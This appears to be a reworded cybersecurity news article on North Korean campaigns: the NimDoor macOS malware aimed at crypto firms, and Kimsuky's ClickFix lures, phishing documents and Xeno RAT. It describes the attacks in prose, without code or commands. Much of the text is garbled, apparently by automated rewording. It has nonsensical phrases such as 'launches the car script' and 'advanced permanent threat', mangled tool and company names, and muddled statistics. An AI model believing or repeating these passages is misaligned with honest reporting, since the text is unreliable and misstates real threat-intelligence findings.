Using malware written in the NIM programming language, it has been observed that threat actors associated with North Korea are targeting Web3 and cryptocurrency businesses, highlighting the constant evolution of tactics.
“In the case of MacOS malware, threat actors employ process injection technology and remote communication via WSS. The TLS encrypted version of the Websocket protocol,” Sentinelone researchers Phil Stokes and Raffaee Sabato said in a report shared with Hacker News.
“The new persistence mechanism utilizes the Signint/Sigterm Signal Handler to install persistence when the malware ends or when the system is restarted.”
Cybersecurity companies track malware components all together under the name Nimdoor. It is worth noting that some aspects of the campaign were previously documented by huntabil.it.
The attack chain includes social engineering tactics that approach targets on messaging platforms such as Telegram and schedule zoom meetings via Calendly, the booking scheduling software. The target will receive an email with a Zoom Meeting link to run the Zoom SDK update script to ensure that you are running the latest version of the VideoConferencing software.
This step runs Applescript, which acts as a delivery vehicle for a second stage script from a remote server, ostensibly redirecting the user to a legitimate zoom redirect link. The newly downloaded script will then solve the zip archive containing the binaries responsible for setting persistence and launching information that steals the bash script.
At the heart of the infection sequence is a C++ loader called Indectwithdyldarm64 (also known as Injectwithdyld). This decrypts two embedded binaries, named target and Trojan1_arm64. InjectWithDyldARM64 launches the target with a suspended state, injects the binary code from Trojan1_arm64, and then resumes execution of the suspended process.
The malware will obtain commands that establish communication with remote servers, collect system information, execute any commands, and allow you to change or configure the current working directory. The results of the execution are sent back to the server.
Trojan1_arm64 can download two more payloads in that part. It is equipped with the ability to collect credentials from web browsers such as Arc, Brave, Google Chrome, Microsoft Edge, and Mozilla Firefox, and extracts data from telegram applications.
Also dropped as part of the attack is a collection of NIM-based executables used as launchpads for CoreKitagent, which users monitor to kill malware processes and ensure persistence.
“This behavior causes user-initiated malware termination to result in the deployment of core components, making the code resilient to basic defensive actions,” the researchers said.
The malware also issues beacons every 30 seconds, launching beacons on one of the two hardcode codes and command and control (C2) servers, while also running snapshots of the list of running processes and additional scripts sent by the server.
The findings show that North Korean threat actors are increasingly training their vision on the MACOS system. Apple Registration weaponizes equipment to act as a backdoor after the explosion to achieve data collection goals.
“Threat actors deployed in North Korea have previously experimented with GO and RUST, and similarly combined scripts and binaries into a multi-stage attack chain,” the researchers said.
“However, NIM’s rather unique ability to perform functions during compilation times allows attackers to blend complex behavior into binary to use less obvious control flows. As a result, they bring together binaries where developer code and NIM runtime code are mixed together at the function level.”
Kimsuky’s Clickfix continues
The disclosure is that Korean cybersecurity company Genman has continuously used Clickfix social engineering tactics to provide a variety of remote access tools as part of a campaign called Babyshark, a known activity cluster attributed to the North Korean hacking group.
The attacks first observed in January 2025 and targeted South Korean national security experts include the use of spear phishing emails pose as interview requests for legitimate German business newspapers, tricking them into opening malicious links containing fake RAR archives.
Residing in the archive are visual basic scripts (VBS) files designed to open decoy Google Docs files in the user’s web browser. Meanwhile, in the background, malicious code is executed to establish host persistence via scheduled tasks and harvesting system information.
The subsequent attacks observed in March 2025 caused the group to impersonate US national security officers, deceived the targets to deceive them, and opened a PDF attachment containing a list of questions related to official meetings during their visit to South Korea.
“They also tried to trick the target into opening the manual and entering the authentication code. “The original ‘Clickfix’ tactic allowed users to click and click to fix a specific error, but this variant corrected their approach by encouraging users to copy and paste the authentication code to access the secure documentation. ”
A similar tactic was documented by ProofPoint in April 2025. The difference is that it claimed that the email message came from Japanese diplomats, urging recipients to set up a US meeting with the Japanese ambassador.
When an obfuscated malicious PowerShell command is executed, the Decoy Google Docs file is used as a distraction to hide the execution of malicious code that establishes persistent communication with the C2 server, collects data and provides additional payloads.
The second variant of the Clickfix strategy provides a Clickfix-style pop-up message to site visitors who click on these posts, using fake websites that mimic the legitimate defense research job portal and create fake lists, entails opening a Windows Run dialog and running a PowerShell command.
The command guides the user to download and install Chrome Remote Desktop software on the system for that part, allowing them to remote SSH via the C2 server “kida.plusdocs.kro”[.]Kr. “Genians said they discovered a directory listing vulnerabilities in the C2 server.
The C2 server also included an IP address from China. We found this to contain keylog records for proton drive links that host the ZIP archives used to drop Babyshark malware on Windows hosts infected by the multi-stage attack chain.
Just like last month, Kimsky is believed to have created a Clickfix in which the threat actor unfolded the Fony Nurbor Capture Verification page, copied and pasted the PowerShell commands, then copied and pasted into a Windows Run dialog that sucks up user information and launches the car script.
“The ‘Babyshark’ campaign is known for its rapid adoption of new attack technologies, and often integrates with script-based mechanisms,” the company said. “The ‘Clickfix’ tactics discussed in this report appear to be another case of publicly available methods that are compatible with malicious use. ”
Over the past few weeks, Kimsky has also been linked to an email phishing campaign that appears to be derived from an academic institution, but distributes malware under the pretext of reviewing research papers.
“The email prompted the recipient to open an HWP document file with attachments of malicious OLE objects,” says Ahnlab. “The document was password protected and recipients had to enter the password provided to the email body to view the document.”
Opening weaponized documents activates the infection process, leading to the execution of PowerShell scripts that perform extensive system reconnaissance, and the deployment of legal anyDesk software for persistent remote access.
The prolific threat actors of Kimsuky are in a state of constant flux when it comes to malware delivery tools, tactics and techniques, with some of the cyberattacks also leveraging Github as a stager to breed open source Trojans called Xeno Rat.
“Malware uses hard-coded Github Personal Access Tokens (PATs) to access the attacker’s private repository,” says Enki Whitehat. “This token was used to download malware from a private repository and upload information collected from the victim system.”
According to a Korean cybersecurity vendor, the attack begins with a spear phishing email containing compressed archive attachments containing Windows Shortcuts (LNK) files. This is used to drop PowerShell scripts that download and launch decoy documents, and could run Xeno RAT and PowerShell Infortarshell Stealer.
Other attack sequences are known to take advantage of a PowerShell-based downloader that retrieves files with RTF extensions from Dropbox, and ultimately launches Xeno Rat. The campaign overlaps with another set of attacks, which offers a variant of Xeno Rat, whose infrastructure is known as Moon Peak.
“The attacker uploaded and maintained extracts of infected system log files and private repository using GitHub Personal Access Tokens (PAT), as well as the malware used in the attack,” Enki said. “This ongoing activity highlights the sustainable and evolving nature of Kimsuky’s operations, including using both GitHub and Dropbox as part of the infrastructure.”
With each NSFOCUS data, Kimsuky, along with Konni, is one of the most active threat groups from Korea, accounting for 5% of the 44 advanced permanent threat (APT) activities recorded by Chinese cybersecurity companies in May 2025.
Source link
